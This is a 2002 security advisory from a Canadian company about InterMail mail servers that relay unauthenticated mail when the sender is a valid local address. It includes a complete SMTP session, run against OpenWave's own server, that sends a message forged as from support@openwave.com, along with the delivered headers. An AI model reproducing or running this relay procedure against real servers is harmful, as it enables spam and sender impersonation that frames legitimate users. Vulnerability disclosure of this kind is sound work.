|
To contact us: |
|
Phone: +1(604)671-5123 Fax: +1(604)552-8573 |
|
Port Coquitlam, B.C. CANADA V3B6H2 |
|
kendryl.com |
|
kendryl.net |
|
Security Alert - InterMail Will Relay Email for a Valid Mailbox without SMTP authentication Author: Victoria Chan, Chief Security Officer Date: August 14th 2002 |
|
After applying the patch for InterMail Servers so that it will no longer accept bogus mailboxes with correct domains, as exploited by the Klez and work alike Virus, there is still another vulnerability. InterMail Servers could still be further exploited. All you need to know is a valid email address, and that is easily available by visiting home pages. The ramifications of this vulnerability is that InterMail users could be framed for sending out SPAM. I will not go into detail on how to set up a Mail Client to do that as that would be a recipe for Spammers. OpenWave are the makers of InterMail. By simply visiting OpenWave's Home Page, I got valid email addresses. Doing an NSLOOKUP determined the best MX for openwave.com is [smtp1.openwave.com]. You start an SMTP session with that server, and use the valid email address for the MAIL FROM. The RCPT TO can be any valid email address you want to send this piece of email via the exploited InterMail Server. To demonstrate this vulnerability, I have effectively exploited OpenWave's own InterMail server - note lack of authentication required to relay: Trying 206.46.164.24... Connected to smtp1.openwave.com. Escape character is '^]'. 220 oe-ismta1.bizmailsrvcs.net ESMTP server (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) ready Wed, 14 Aug 2002 18:10:36 -0500 HELO westernstar.kendryl.net 250 oe-ismta1.bizmailsrvcs.net MAIL FROM: support@openwave.com 250 Sender <support@openwave.com> Ok RCPT TO: abuse@kendryl.net 250 Recipient <abuse@kendryl.net> Ok DATA 354 Ok Send data ending with <CRLF>.<CRLF> Subject: InterMail Relay without SMTP Authentication From: support@openwave.com To: abuse@kendryl.net InterMail Relay without SMTP Authentication . 250 Message received: 20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net QUIT 221 oe-ismta1.bizmailsrvcs.net ESMTP server closing connection Connection closed by foreign host. Here is the vulnerability confirmed by receiving the piece of relayed email: Return-Path: <support@openwave.com> Delivered-To: abuse@kendryl.net Received: (qmail 42376 invoked by uid 1007); 14 Aug 2002 23:12:03 -0000 Received: from support@openwave.com by westernstar.kendryl.net by uid 1004 by STACKFIT (Scanned4 Virus & SPAM Keywords 0.496784); 14 Aug 2002 23:12:03 -0000 Received: from oe-mp1pub.managedmail.com (HELO oe-mp1.bizmailsrvcs.net) (206.46.164.22) by 820252.cipherkey.com with SMTP; 14 Aug 2002 23:12:03 -0000 Received: from oe-ismta1.bizmailsrvcs.net ([206.46.164.26]) by oe-mp1.bizmailsrvcs.net (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) with ESMTP id <20020814231201.UJUZ21795.oe-mp1.bizmailsrvcs.net@oe-ismta1.bizmailsrvcs.net> for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:12:01 -0500 Received: from westernstar.kendryl.net ([64.114.82.252]) by oe-ismta1.bizmailsrvcs.net (InterMail vM.5.01.03.15 201-253-122-118-115-20011108) with SMTP id <20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net> for <abuse@kendryl.net>; Wed, 14 Aug 2002 18:11:08 -0500 Subject: InterMail Relay without SMTP Authentication From: support@openwave.com To: abuse@kendryl.net Message-Id: <20020814231108.XCMY18545.oe-ismta1.bizmailsrvcs.net@westernstar.kendryl.net> Date: Wed, 14 Aug 2002 18:12:01 -0500 InterMail Relay without SMTP Authentication Disclaimer - This is only a security audit. The above examples are actual SMTP transactions intended to demonstrate this InterMail Vulnerability. The information herein is not intended to be used to carry out exploits on InterMail Servers. |